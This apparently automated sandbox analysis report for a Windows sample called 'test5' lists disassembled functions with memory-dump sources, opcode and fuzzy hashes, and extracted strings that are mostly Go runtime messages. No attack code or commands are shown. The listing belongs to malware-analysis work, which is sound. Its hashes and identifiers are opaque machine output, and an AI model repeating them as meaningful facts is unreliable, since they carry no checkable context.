String ID: `&n$gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek
API String ID: 0-1699325636
Opcode ID: 5e5bef18eadd8b810fe0dd311f1ef985780234c4fc23cebe915b18f81cf4d82f
Instruction ID: 111b63f833885fb7a312b3f46581ac83eae9e5caa838620674b21040cdc18890
Opcode Fuzzy Hash: 5e5bef18eadd8b810fe0dd311f1ef985780234c4fc23cebe915b18f81cf4d82f
Instruction Fuzzy Hash: BD519536109B84C2EB50CF65F48539ABBA6F785784F51823ADA8C83B66DF7DC485CB40

Function 0000021551C0E0E8 Relevance: 1.8, APIs: 1, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

_initp_misc_winsig.LIBCMT ref: 0000021551C0E11C

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _initp_misc_winsig
String ID:
API String ID: 2710132595-0
Opcode ID: f5eeccd02aae99182859cd355c685068cf330a2df8fc0dd784810881261ec21a
Instruction ID: 6ffecf4ebaf84dbf7ab41441f9d7c4594cca9b152b33cdfa5167249d9f018247
Opcode Fuzzy Hash: f5eeccd02aae99182859cd355c685068cf330a2df8fc0dd784810881261ec21a
Instruction Fuzzy Hash: 21A1C631609A098FEF54FF75E89CAAA37F2F3A8301721893A904AD7174DA7CD555CB40

Function 000002155375D52F Relevance: 1.8, APIs: 1, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

_initp_misc_winsig.LIBCMT ref: 000002155375D563

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _initp_misc_winsig
String ID:
API String ID: 2710132595-0
Opcode ID: f5eeccd02aae99182859cd355c685068cf330a2df8fc0dd784810881261ec21a
Instruction ID: ce5a33d566a6260ba08a42028ddd7625af9f251b8e2ac35d8b359f4df311a19c
Opcode Fuzzy Hash: f5eeccd02aae99182859cd355c685068cf330a2df8fc0dd784810881261ec21a
Instruction Fuzzy Hash: 57A1C431619A098FEF54FF65E89CAAA37B2F3A8301721893A904AD7270DA7CD555CB40

Function 006ECA80 Relevance: 1.7, Strings: 1, Instructions: 498COMMON

Download Yara Rule

Strings

", xrefs: 006ED20C

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: ee6a38f8df12718a8599351b2621cf41095c424588bfb826aceb60c3ffb1e683
Instruction ID: cd72e2a2a221e869c8f8d4140fa541eb508aac779fad2cfad170546e8bffd5eb
Opcode Fuzzy Hash: ee6a38f8df12718a8599351b2621cf41095c424588bfb826aceb60c3ffb1e683
Instruction Fuzzy Hash: 9732F572609BC085DB61CF62E4843DEB762F78ABA4F45822ADB9C477A9CF39C445C740

Function 006EA4E0 Relevance: 1.7, Strings: 1, Instructions: 441COMMON

Download Yara Rule

Strings

!"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, xrefs: 006EA5ED, 006EA6F6, 006EA837, 006EA95F

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
API String ID: 0-2911004680
Opcode ID: d3b93a2fece257cfb965cb6efa140d660bd7ffff010f2b654b9c322d66e3703c
Instruction ID: 2af278b3f2d3a2e36d9745efa47ede3fedbfe54fabfb513e0d1293a566163d9e
Opcode Fuzzy Hash: d3b93a2fece257cfb965cb6efa140d660bd7ffff010f2b654b9c322d66e3703c
Instruction Fuzzy Hash: F9F10431716BC482DA40DFA6E8043BAA763F784BD0F998026EE5E47786DB7CE845C705

Function 006E8800 Relevance: 1.6, Strings: 1, Instructions: 302COMMON

Download Yara Rule

Strings

`a}, xrefs: 006E89A3, 006E8A27, 006E8ACB, 006E8B53

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: `a}
API String ID: 0-3854845269
Opcode ID: c22000196ecc562c940a6878a321f0ec7f5ca8767160c4050052a4a3dc8161e1
Instruction ID: 4d5e2aa32fa0129f188da237dc5a6b343634c007b946a65ebae2badfd6a9e4ad
Opcode Fuzzy Hash: c22000196ecc562c940a6878a321f0ec7f5ca8767160c4050052a4a3dc8161e1
Instruction Fuzzy Hash: 1ED1907220ABC488DB64CB16E4403AAB7A3F386B80F59907ADECD53B59CF78C485C701

Function 006AC480 Relevance: 1.5, Strings: 1, Instructions: 267COMMON

Download Yara Rule

Strings

runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listruntime.Pinner: argument is nilcasgstatus: , xrefs: 006AC825

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listruntime.Pinner: argument is nilcasgstatus:
API String ID: 0-1312986596
Opcode ID: 80431ab345ef39910831ebdacc3065afccad0df834996bb22e9f2a33af1c0718
Instruction ID: 77b598b92fc7b4b8e39fb7fba627ced54c65c3b600270463a2cf2c712c1a7b9b
Opcode Fuzzy Hash: 80431ab345ef39910831ebdacc3065afccad0df834996bb22e9f2a33af1c0718
Instruction Fuzzy Hash: 58A17E76709B84C1CA10DB16F4406AAA766F38ABD0F546126EF8D57B29CF38D891CF40

Function 00690DC0 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

bulkBarrierPreWrite: unaligned argumentsruntime: typeBitsBulkBarrier with type refill of span with free space remaining/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unkn, xrefs: 00691167

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: bulkBarrierPreWrite: unaligned argumentsruntime: typeBitsBulkBarrier with type refill of span with free space remaining/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unkn
API String ID: 0-2740983204
Opcode ID: 70926af905f72602565be470ee17ca597441bb5a2fb381ab9a670306bf625a08
Instruction ID: 9fd54556344c04295f760f2bfbd16d31b2a955e28af18609e1cf5641bf7b10ff
Opcode Fuzzy Hash: 70926af905f72602565be470ee17ca597441bb5a2fb381ab9a670306bf625a08
Instruction Fuzzy Hash: 5E9190B6715A9486EF508B16E44039AB76AF34AFC0F648126EF8D57F18DF39C4968700

Function 007025E0 Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

crypto/aes: invalid key size executing on Go runtime stacknotesleep - waitm out of sync/cpu/classes/idle:cpu-seconds/cpu/classes/user:cpu-seconds/gc/heap/allocs-by-size:bytes/gc/stack/starting-size:bytesgc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode=, xrefs: 00702945

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: crypto/aes: invalid key size executing on Go runtime stacknotesleep - waitm out of sync/cpu/classes/idle:cpu-seconds/cpu/classes/user:cpu-seconds/gc/heap/allocs-by-size:bytes/gc/stack/starting-size:bytesgc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode=
API String ID: 0-4043407021
Opcode ID: 8d7e609d9cc74623b38c50f456534e705eb4ad7b96f468bc0af77b09696b916a
Instruction ID: d89e6dedf82dc69f44f10a8c8f26580c5cbe0e171d546692c2da211e211e4293
Opcode Fuzzy Hash: 8d7e609d9cc74623b38c50f456534e705eb4ad7b96f468bc0af77b09696b916a
Instruction Fuzzy Hash: 818156667106A5D6EA009F28980837EABA2F351B89FD9D614EF5B077C3DB3CD812D310

Function 006BAB80 Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

9n, xrefs: 006BACD7

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: 9n
API String ID: 0-1086281081
Opcode ID: 6892263c6cbda1d5a554d6a9682a0352c9781e893d607fb48dc16cbb100b327e
Instruction ID: 3ef971618dc1ac3386aa1c32aa7fe23aacd6b2743428d8247b5c438cdd75683b
Opcode Fuzzy Hash: 6892263c6cbda1d5a554d6a9682a0352c9781e893d607fb48dc16cbb100b327e
Instruction Fuzzy Hash: 86A1C576605B84C6D740CF65E4953AEBB62F34AB90F088126DF9C83716DF79C482CB01

Function 006AB5E0 Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

bad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 006AB8A7

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: bad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod
API String ID: 0-2099802129
Opcode ID: b13e201b23a9d4428164f7bb627c64b7e61e5b9a53a241210332853dda3207da
Instruction ID: 6cd7b45bbdb3d80a9cc222990fd6fd9b939ba6c775e4f22ca8449003ad893115
Opcode Fuzzy Hash: b13e201b23a9d4428164f7bb627c64b7e61e5b9a53a241210332853dda3207da
Instruction Fuzzy Hash: ED61B1B3710B8882DA40AF55E44039A776AF78ABD0F449226EF9D17796CF3CD985C740

Function 0069DD60 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbiddencompileCallback: float results not supportedcannot trace user goroutine on its own stackunsafe.Slice: ptr is nil and len is not , xrefs: 0069DE50

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbiddencompileCallback: float results not supportedcannot trace user goroutine on its own stackunsafe.Slice: ptr is nil and len is not
API String ID: 0-3110597650
Opcode ID: 9cb37851b6c9840ce88d14ad932542d084d77550ba1c3d7db6fbb700ecb39c48
Instruction ID: 3e7194fce2cb49a661d44ca2ba8b358ad935b2f59b7c60a5cf9b9693ebbdb3f8
Opcode Fuzzy Hash: 9cb37851b6c9840ce88d14ad932542d084d77550ba1c3d7db6fbb700ecb39c48
Instruction Fuzzy Hash: 8721F2F3B02AC443DF058F19D4803A86B26E79AFD8F49A176CF4957756CA68C596C300

Function 0000021551C1BAB0 Relevance: .8, Instructions: 783COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a07843770b9451d4ac558cc520e1e60a991d7943e83801c352df3725012db3a9
Instruction ID: 42316a8d2b6d89517bc730775021f3b32cca992305cd180f58141e841a37b639
Opcode Fuzzy Hash: a07843770b9451d4ac558cc520e1e60a991d7943e83801c352df3725012db3a9
Instruction Fuzzy Hash: AB620B31228A558FD31CCB1CC5B1B7AB7E1FB89340F44896DE28BCB692C639D945CB91

Function 0000021551C1B140 Relevance: .8, Instructions: 761COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e962665f58d5d5727d455e658583aa4da8621b5749926b7e243a7ad70d2d8bb
Instruction ID: d20e5abc5e63d0b44ff3dddc407eb8825553a10a004cb11b49796069076b45d1
Opcode Fuzzy Hash: 7e962665f58d5d5727d455e658583aa4da8621b5749926b7e243a7ad70d2d8bb
Instruction Fuzzy Hash: 3252EC312286558FD31CCF1CC5A1E7AB7E1FB8D340F448A6DE28ACB692C639E545CB91

Function 0000021551BFD784 Relevance: .6, Instructions: 560COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 364b806096a3aa3b8234d976ad9a261243ac4bd49e8b4c0c2da675f77400e73a
Instruction ID: 60e22a1ea03fb2569a764e63042d3e1b48e4717b75d32dfd23e2ea2cf299b0a8
Opcode Fuzzy Hash: 364b806096a3aa3b8234d976ad9a261243ac4bd49e8b4c0c2da675f77400e73a
Instruction Fuzzy Hash: 3402C035614F199BF764DB78C8857E677E2FBA8310F544A6DD48BC3292EA38F4828740

Function 000002155374CBCB Relevance: .6, Instructions: 560COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 364b806096a3aa3b8234d976ad9a261243ac4bd49e8b4c0c2da675f77400e73a
Instruction ID: 7881b4626b79092edd0d211ce29247d295384bb20feb424d874ca56364cc96bb
Opcode Fuzzy Hash: 364b806096a3aa3b8234d976ad9a261243ac4bd49e8b4c0c2da675f77400e73a
Instruction Fuzzy Hash: C6028731A24F199BFBA8DB74C8457E673E2FBA8304F54496DD48BD3292DA38F5428740

Function 00704640 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aa27427e928d33c29d4e4561bc19acc4fa8c3f9964e673de68e226d3bc61b7c
Instruction ID: 3760cffc81de33bf12976aa8e2a3be7e2c0f6478f2648faf2ca1eff9542d742e
Opcode Fuzzy Hash: 3aa27427e928d33c29d4e4561bc19acc4fa8c3f9964e673de68e226d3bc61b7c
Instruction Fuzzy Hash: 3C128BB3A18BC4C1D6758B65E4403EAA3A0F39AB84F549216DB9D17B9ADF3CD5D0C700

Function 006FFB20 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
